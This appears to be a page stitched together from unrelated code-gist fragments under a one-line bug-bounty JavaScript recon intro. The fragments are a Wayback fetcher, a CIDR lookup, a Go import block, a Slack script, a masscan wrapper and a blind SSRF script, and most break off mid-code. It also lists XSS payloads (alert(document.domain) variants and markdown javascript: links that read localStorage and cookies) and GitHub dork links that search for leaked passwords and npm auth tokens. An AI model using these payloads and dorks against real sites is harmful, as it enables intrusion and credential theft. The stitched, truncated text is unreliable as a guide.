This is a simple guide to performing JavaScript recon in bug bounty hunting.
- The first step is to collect as many JavaScript files as you can (more files = more paths and parameters -> more vulnerabilities).
| import requests | |
| import re | |
| import sys | |
| from multiprocessing.dummy import Pool | |
| def robots(host): | |
| r = requests.get( | |
| 'https://web.archive.org/cdx/search/cdx\ | |
| ?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host) |
| // How many ways can you alert(document.domain)? | |
| // Comment with more ways and I'll add them :) | |
| // I already know about the JSFuck way, but it's too long to add (: | |
| // Direct invocation | |
| alert(document.domain); | |
| (alert)(document.domain); | |
| al\u0065rt(document.domain); | |
| al\u{65}rt(document.domain); | |
| window['alert'](document.domain); |
| import requests, json | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning, InsecurePlatformWarning, SNIMissingWarning | |
| from bs4 import BeautifulSoup | |
| # Silence the urllib3 warnings for unverified HTTPS requests and for TLS | |
| # platform gaps. NOTE(review): this only hides the warnings; if a request | |
| # below passes verify=False, certificate validation is still disabled. | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| requests.packages.urllib3.disable_warnings(InsecurePlatformWarning) | |
| requests.packages.urllib3.disable_warnings(SNIMissingWarning) | |
| # another source of CIDRs by ASN | |
| def getIPCidrs(asn): |
| package main | |
| import ( | |
| "os" | |
| "fmt" | |
| "strings" | |
| "regexp/syntax" | |
| "unicode/utf8" | |
| ) |
| #!/usr/bin/env bash | |
| #################################################################################### | |
| # Slack Bash console script for sending messages. | |
| #################################################################################### | |
| # Installation | |
| # $ curl -s https://gist.github.com/andkirby/67a774513215d7ba06384186dd441d9e/raw --output /usr/bin/slack | |
| # $ chmod +x /usr/bin/slack | |
| #################################################################################### | |
| # USAGE | |
| # Send message to slack channel/user |
| echo "" | |
| echo "************ Github Dork Links (must be logged in) *******************" | |
| echo "" | |
| echo " password" | |
| echo "https://github.com/search?q=%22$1%22+password&type=Code" | |
| echo "https://github.com/search?q=%22$without_suffix%22+password&type=Code" | |
| echo "" | |
| echo " npmrc _auth" |
| #!/bin/bash | |
| TARGETS="$1" | |
| PORT=443 | |
| # if the file "$TARGETS" exists, use its contents as the target specification; otherwise treat the input as a CIDR | |
| if [ -f "$TARGETS" ]; then | |
| IPs="$(masscan -oL - -iL "$TARGETS" -p "$PORT" 2>/dev/null | grep -v "^#.*" | cut -d' ' -f4)" | |
| else | |
| IPs="$(masscan -oL - "$TARGETS" -p "$PORT" 2>/dev/null | grep -v "^#.*" | cut -d' ' -f4)" |
| echo "Blind SSRF testing - append to parameters and add new parameters @hussein98d" | |
| echo "Usage: bash script.sh domain.com http://server-callbak" | |
| echo "This script uses https://github.com/ffuf/ffuf, https://github.com/lc/gau, https://github.com/tomnomnom/waybackurls" | |
| if [ -z "$1" ]; then | |
| echo >&2 "ERROR: Domain not set" | |
| exit 2 | |
| fi | |
| if [ -z "$2" ]; then | |
| echo >&2 "ERROR: Sever link not set" | |
| exit 2 |
| [Basic](javascript:alert('Basic')) | |
| [Local Storage](javascript:alert(JSON.stringify(localStorage))) | |
| [CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive')) | |
| [URL](javascript://www.google.com%0Aalert('URL')) | |
| [In Quotes]('javascript:alert("InQuotes")') | |
| ) | |
| ) | |
| [XSS](javascript:prompt(document.cookie)) | |
| [XSS](j a v a s c r i p t:prompt(document.cookie)) | |
| [XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) |